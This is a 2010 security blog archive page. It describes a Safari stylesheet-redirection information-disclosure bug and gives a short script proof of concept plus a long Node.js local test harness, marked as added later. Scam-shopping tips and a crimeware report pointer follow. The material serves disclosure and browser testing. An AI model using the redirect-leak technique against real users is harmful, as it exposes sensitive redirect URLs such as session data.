Archive for January, 2010

Apple Safari Stylesheet Redirection vulnerability

There’s a 0-day vulnerability affecting Safari 4.x users, it’s not critical, but it is important to be aware of it.

<link rel="stylesheet" type="text/css" href="">
<script language="javascript">
// setTimeout is used just to wait for the page (and its stylesheet) to finish loading
setTimeout("alert(document.styleSheets[0].href)", 10000);
</script>

Listing 01 – Apple Safari Stylesheet Redirection PoC

Cesar Cerrudo discovered this vulnerability and described it as follows: Safari did not report the URL specified in the LINK element’s href value; instead, when the stylesheet request was redirected, it exposed the redirect’s target URL to the page.

A malicious user may take advantage of this vulnerability to steal sensitive information.
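To check whether a given browser behaves the way the PoC above relies on, here is a small Node.js harness (an added example, not code from the original post or from Cesar Cerrudo): it serves a page from localhost, has that page load a stylesheet from 127.0.0.1 (so the request is cross-origin) whose URL only redirects, and then compares the href the page requested with the href the browser reports in document.styleSheets[0]. The port, the paths and the MARKER value are assumptions.

```javascript
// Added example, not part of the original post: a Node.js harness for checking
// whether a browser reveals a cross-origin stylesheet's redirect target through
// document.styleSheets[i].href, the value the PoC above alerts. Port, paths
// and MARKER are assumptions.
const PORT = 8080;
// Constructed stand-in for whatever a real redirect target might carry (for
// example a session identifier); a browser should never hand it to the page.
const MARKER = "REDIRECT-TARGET-MARKER";
// Pure routing so the server's behaviour can be checked without a browser.
function route(pathname) {
  if (pathname === "/style.css") {
    return { status: 302, headers: { Location: "/final.css?m=" + MARKER }, body: "" };
  }
  if (pathname === "/final.css") {
    return { status: 200, headers: { "Content-Type": "text/css" }, body: "body{color:#000}" };
  }
  if (pathname === "/") {
    return { status: 200, headers: { "Content-Type": "text/html" }, body: testPage() };
  }
  return { status: 404, headers: { "Content-Type": "text/plain" }, body: "not found" };
}
// A leak means the href the browser reports is not the href the page requested.
function verdict(requested, reported) {
  if (!reported) return "no stylesheet href reported";
  return reported === requested ? "OK: browser reports only the requested URL"
    : "LEAK: browser exposes redirect target " + reported;
}
// Page is served from localhost; the stylesheet comes from 127.0.0.1 (cross-origin).
function testPage() {
  return [
    '<!doctype html><link id="s" rel="stylesheet" href="http://127.0.0.1:' + PORT + '/style.css">',
    '<pre id="out">checking...</pre><script>',
    verdict.toString(),
    "window.addEventListener('load', function () {",
    "  var requested = document.getElementById('s').href;",
    "  var reported = document.styleSheets[0] && document.styleSheets[0].href;",
    "  document.getElementById('out').textContent = verdict(requested, reported);",
    "});</script>",
  ].join("\n");
}
// Run `node harness.js --serve` and open http://localhost:8080/ in the browser under test.
if (process.argv.includes("--serve")) {
  require("http").createServer((req, res) => {
    const r = route(new URL(req.url, "http://localhost").pathname);
    res.writeHead(r.status, r.headers);
    res.end(r.body);
  }).listen(PORT, () => console.log("listening on http://localhost:" + PORT + "/"));
}
```

A browser that prints "OK" reports only the URL the page asked for; one that prints "LEAK" hands the page the redirect target, which is the information disclosure described above.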

Be cautious when surfing the net!

This fraudulent site attempts to scam gullible Mac users.

Please be careful when shopping online. Here are some simple tips on how to spot suspicious vendors:

1) You can’t find sufficient details to verify the store, such as a contact number and store location.

2) You can’t find interactive reviews. Static reviews, such as a “Testimonials” page, can easily be fabricated.

3) Check the DNS records for the site’s IP address. A Whois lookup provides enough information to trace the people behind a suspicious website; in most cases you’ll find associations with, and a history of, various forms of fraudulent activity.

The best choice is to buy from known, legitimate retailers and online stores. It may cost more, but it assures your online transaction is secure, provides buyer protection and guarantees satisfaction.

Engaging in fraudulent online deals could cost you your identity and your money.

Stay safe!

Updated as of 15.01.2010

I received this message from Skype (below), which links to a very similar-looking website. Of course, it’s a certified scam.

Malware Intelligence Report

“Crimeware 2009”, an extensive compilation of analysis, findings and intelligence, is a 262-page report written by Jorge Mieres. [Refer to this link]